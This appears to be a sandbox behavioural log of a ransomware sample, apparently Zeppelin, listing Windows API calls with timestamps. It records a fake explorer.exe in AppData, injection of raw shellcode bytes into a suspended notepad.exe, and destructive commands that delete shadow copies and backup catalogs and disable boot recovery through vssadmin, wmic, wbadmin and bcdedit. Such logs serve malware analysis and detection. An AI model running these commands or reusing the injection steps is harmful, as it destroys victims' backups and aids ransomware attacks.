NtResumeThread
April 3, 2021, 10:37 a.m.
thread_handle:
0x000004cc
suspend_count:
1
process_identifier:
2504
1
0
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
7032
thread_handle:
0x00000284
process_identifier:
3236
current_directory:
C:\Users\test22\AppData\Local\Temp
filepath:
C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe
track:
1
command_line:
"C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -start
filepath_r:
C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe
stack_pivoted:
0
creation_flags:
67634192
(CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles:
0
process_handle:
0x0000027c
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
1472
thread_handle:
0x000004dc
process_identifier:
7400
current_directory:
filepath:
track:
1
command_line:
notepad.exe
filepath_r:
stack_pivoted:
0
creation_flags:
134217796
(CREATE_NO_WINDOW|CREATE_SUSPENDED|IDLE_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x000004e0
1
1
0
NtAllocateVirtualMemory
April 3, 2021, 10:37 a.m.
process_identifier:
7400
region_size:
4096
stack_dep_bypass:
0
stack_pivoted:
0
heap_dep_bypass:
0
protection:
64
(PAGE_EXECUTE_READWRITE)
base_address:
0x000b0000
allocation_type:
12288
(MEM_COMMIT|MEM_RESERVE)
process_handle:
0x000004dc
1
0
0
WriteProcessMemory
April 3, 2021, 10:37 a.m.
buffer:
C : \ U s e r s \ t e s t 2 2 \ A p p D a t a \ L o c a l \ T e m p \ Z e p p e l i n . e x e
base_address:
0x000b0000
process_identifier:
7400
process_handle:
0x000004dc
1
1
0
NtAllocateVirtualMemory
April 3, 2021, 10:37 a.m.
process_identifier:
7400
region_size:
4096
stack_dep_bypass:
0
stack_pivoted:
0
heap_dep_bypass:
0
protection:
64
(PAGE_EXECUTE_READWRITE)
base_address:
0x00100000
allocation_type:
12288
(MEM_COMMIT|MEM_RESERVE)
process_handle:
0x000004dc
1
0
0
WriteProcessMemory
April 3, 2021, 10:37 a.m.
buffer:
³suzsuÿsu
base_address:
0x00100000
process_identifier:
7400
process_handle:
0x000004dc
1
1
0
NtAllocateVirtualMemory
April 3, 2021, 10:37 a.m.
process_identifier:
7400
region_size:
4096
stack_dep_bypass:
0
stack_pivoted:
0
heap_dep_bypass:
0
protection:
64
(PAGE_EXECUTE_READWRITE)
base_address:
0x00110000
allocation_type:
12288
(MEM_COMMIT|MEM_RESERVE)
process_handle:
0x000004dc
1
0
0
WriteProcessMemory
April 3, 2021, 10:37 a.m.
buffer:
UìÄðVWEð}𥥥¥hè ÿUøÿuüÿUðø tíhÎúÞÿUô_^å] UìÄØSVW3ÒUØUÜUàUüØ3ÀUh¡Ð dÿ0d
Û7 UุРè2þÿEàèX|ýÿPhäÐ è=ýÿPè?ýÿEäUܸüÐ ès2þÿEÜè/|ýÿPhäÐ èýÿPèýÿEèUظ0Ñ èJ2þÿEØè|ýÿPhäÐ èëýÿPèíýÿEìUü3Àèü(þÿj@h 0 EüèEýÿÀ@Pj Sè¥ýÿðuðEøPEüè(ýÿÀ@PEüèýÿPVSè ýÿj@h 0 jj SèoýÿðEøPjEäPVSè|ýÿ}øuHj@h 0 hô j SèBýÿøEøPhô hàÎ WSèKýÿ}øô uEôPj VWj j Sè ýÿ
À3ÀZYYdh¨Ð Eغ èÔvýÿEüèÜ}ýÿÃéVoýÿëã_^[å]à ÿÿÿÿ+ ö1Pµ~{º wÔ>Äsý¾P³ãD
base_address:
0x00110000
process_identifier:
7400
process_handle:
0x000004dc
1
1
0
NtResumeThread
April 3, 2021, 10:37 a.m.
thread_handle:
0x000002d0
suspend_count:
1
process_identifier:
3236
1
0
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
2776
thread_handle:
0x00000520
process_identifier:
1160
current_directory:
C:\Windows\system32\
filepath:
track:
1
command_line:
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x00000528
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
3908
thread_handle:
0x00000530
process_identifier:
8340
current_directory:
C:\Windows\system32\
filepath:
track:
1
command_line:
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x0000052c
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
4408
thread_handle:
0x00000538
process_identifier:
8704
current_directory:
C:\Windows\system32\
filepath:
track:
1
command_line:
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x00000534
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
8740
thread_handle:
0x00000540
process_identifier:
3360
current_directory:
C:\Windows\system32\
filepath:
track:
1
command_line:
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x0000053c
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
5752
thread_handle:
0x00000548
process_identifier:
5256
current_directory:
C:\Windows\system32\
filepath:
track:
1
command_line:
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x00000544
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
4608
thread_handle:
0x00000550
process_identifier:
5260
current_directory:
C:\Users\test22\AppData\Roaming\Microsoft\Windows\
filepath:
track:
1
command_line:
"C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 0
filepath_r:
stack_pivoted:
0
creation_flags:
48
(CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles:
0
process_handle:
0x0000054c
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
6080
thread_handle:
0x00000084
process_identifier:
7316
current_directory:
C:\Windows\system32
filepath:
C:\Windows\System32\wbem\WMIC.exe
track:
1
command_line:
wmic shadowcopy delete
filepath_r:
C:\Windows\System32\Wbem\WMIC.exe
stack_pivoted:
0
creation_flags:
524288
(EXTENDED_STARTUPINFO_PRESENT)
inherit_handles:
1
process_handle:
0x00000088
1
1
0
CreateProcessInternalW
April 3, 2021, 10:37 a.m.
thread_identifier:
3180
thread_handle:
0x00000084
process_identifier:
8628
current_directory:
C:\Windows\system32
filepath:
C:\Windows\System32\vssadmin.exe
track:
1
command_line:
vssadmin delete shadows /all /quiet
filepath_r:
C:\Windows\system32\vssadmin.exe
stack_pivoted:
0
creation_flags:
524288
(EXTENDED_STARTUPINFO_PRESENT)
inherit_handles:
1
process_handle:
0x00000088
1
1
0